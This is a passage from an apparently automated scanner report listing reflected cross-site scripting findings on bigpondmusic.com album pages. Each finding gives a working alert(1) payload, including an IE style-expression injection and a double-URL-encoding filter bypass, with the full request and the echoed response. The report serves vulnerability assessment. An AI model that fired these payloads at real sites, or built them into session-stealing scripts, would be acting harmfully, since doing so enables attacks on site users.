Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:24:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88527


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album8ea10';746216d7018';
   s.prop4 = 'cheryl-cole';
   s.prop5 = 'promise-this2';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3
...[SNIP]...

2.36. http://bigpondmusic.com/album/cheryl-cole/promise-this2 [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/cheryl-cole/promise-this2

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36267"style%3d"x%3aexpression(alert(1))"89a1f9e1cf8 was submitted in the h parameter. This input was echoed as 36267"style="x:expression(alert(1))"89a1f9e1cf8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/cheryl-cole/promise-this2?h=76639449836267"style%3d"x%3aexpression(alert(1))"89a1f9e1cf8 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:29:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 111361


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Cheryl Cole - Promise This -
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/cheryl-cole/promise-this2?h=76639449836267"style="x:expression(alert(1))"89a1f9e1cf8" />
...[SNIP]...

2.37. http://bigpondmusic.com/album/cheryl-cole/promise-this2 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/cheryl-cole/promise-this2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9888f"style%3d"x%3aexpression(alert(1))"97f64925c9b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9888f"style="x:expression(alert(1))"97f64925c9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/cheryl-cole/promise-this2?9888f"style%3d"x%3aexpression(alert(1))"97f64925c9b=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:24:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 111424


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Cheryl Cole - Promise This -
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/cheryl-cole/promise-this2?9888f"style="x:expression(alert(1))"97f64925c9b=1" />
...[SNIP]...

2.38. http://bigpondmusic.com/album/crowded-house/the-very-very-best-of-crowded-house [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/crowded-house/the-very-very-best-of-crowded-house

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f944%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea5d020ae3d5 was submitted in the REST URL parameter 1. This input was echoed as 5f944"><script>alert(1)</script>a5d020ae3d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album5f944%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea5d020ae3d5/crowded-house/the-very-very-best-of-crowded-house HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:19:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88521


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album5f944"><script>alert(1)</script>a5d020ae3d5/crowded-house/the-very-very-best-of-crowded-house" />
...[SNIP]...

2.39. http://bigpondmusic.com/album/crowded-house/the-very-very-best-of-crowded-house [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/crowded-house/the-very-very-best-of-crowded-house

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fac8e'%3b464820d9d25 was submitted in the REST URL parameter 1. This input was echoed as fac8e';464820d9d25 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albumfac8e'%3b464820d9d25/crowded-house/the-very-very-best-of-crowded-house HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:19:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88215


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumfac8e';464820d9d25';
   s.prop4 = 'crowded-house';
   s.prop5 = 'the-very-very-best-of-crowded-house';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|'
...[SNIP]...

2.40. http://bigpondmusic.com/album/crowded-house/the-very-very-best-of-crowded-house [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/crowded-house/the-very-very-best-of-crowded-house

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54cb1"style%3d"x%3aexpression(alert(1))"deab3ae0b1b was submitted in the h parameter. This input was echoed as 54cb1"style="x:expression(alert(1))"deab3ae0b1b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/crowded-house/the-very-very-best-of-crowded-house?h=74570223754cb1"style%3d"x%3aexpression(alert(1))"deab3ae0b1b HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:19:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 150486


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Crowded House - The Very Ver
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/crowded-house/the-very-very-best-of-crowded-house?h=74570223754cb1"style="x:expression(alert(1))"deab3ae0b1b" />
...[SNIP]...

2.41. http://bigpondmusic.com/album/crowded-house/the-very-very-best-of-crowded-house [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/crowded-house/the-very-very-best-of-crowded-house

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82f6a"style%3d"x%3aexpression(alert(1))"0184eb381c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 82f6a"style="x:expression(alert(1))"0184eb381c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/crowded-house/the-very-very-best-of-crowded-house?82f6a"style%3d"x%3aexpression(alert(1))"0184eb381c7=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:19:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 150546


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Crowded House - The Very Ver
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/crowded-house/the-very-very-best-of-crowded-house?82f6a"style="x:expression(alert(1))"0184eb381c7=1" />
...[SNIP]...

2.42. http://bigpondmusic.com/album/enrique-iglesias/euphoria3 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/enrique-iglesias/euphoria3

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c305%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea89f56eddf4 was submitted in the REST URL parameter 1. This input was echoed as 7c305"><script>alert(1)</script>a89f56eddf4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album7c305%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea89f56eddf4/enrique-iglesias/euphoria3 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:23:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88022


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album7c305"><script>alert(1)</script>a89f56eddf4/enrique-iglesias/euphoria3" />
...[SNIP]...

2.43. http://bigpondmusic.com/album/enrique-iglesias/euphoria3 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/enrique-iglesias/euphoria3

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 397dc'%3b4e76ceeb81a was submitted in the REST URL parameter 1. This input was echoed as 397dc';4e76ceeb81a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album397dc'%3b4e76ceeb81a/enrique-iglesias/euphoria3 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:23:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87862


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album397dc';4e76ceeb81a';
   s.prop4 = 'enrique-iglesias';
   s.prop5 = 'euphoria3';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop
...[SNIP]...

2.44. http://bigpondmusic.com/album/enrique-iglesias/euphoria3 [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/enrique-iglesias/euphoria3

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f169e"style%3d"x%3aexpression(alert(1))"07c1ed7cd2e was submitted in the h parameter. This input was echoed as f169e"style="x:expression(alert(1))"07c1ed7cd2e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/enrique-iglesias/euphoria3?h=670210759f169e"style%3d"x%3aexpression(alert(1))"07c1ed7cd2e HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:22:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 124160


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Enrique Iglesias - Euphoria
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/enrique-iglesias/euphoria3?h=670210759f169e"style="x:expression(alert(1))"07c1ed7cd2e" />
...[SNIP]...

2.45. http://bigpondmusic.com/album/enrique-iglesias/euphoria3 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/enrique-iglesias/euphoria3

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 330e0"style%3d"x%3aexpression(alert(1))"04885151f99 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 330e0"style="x:expression(alert(1))"04885151f99 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/enrique-iglesias/euphoria3?330e0"style%3d"x%3aexpression(alert(1))"04885151f99=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:22:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 124781


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Enrique Iglesias - Euphoria
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/enrique-iglesias/euphoria3?330e0"style="x:expression(alert(1))"04885151f99=1" />
...[SNIP]...

2.46. http://bigpondmusic.com/album/far-east-movement/like-a-g6 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/far-east-movement/like-a-g6

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e55c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9e81b9f299b was submitted in the REST URL parameter 1. This input was echoed as 4e55c"><script>alert(1)</script>9e81b9f299b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album4e55c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9e81b9f299b/far-east-movement/like-a-g6 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88260


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album4e55c"><script>alert(1)</script>9e81b9f299b/far-east-movement/like-a-g6" />
...[SNIP]...

2.47. http://bigpondmusic.com/album/far-east-movement/like-a-g6 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/far-east-movement/like-a-g6

Issue detail

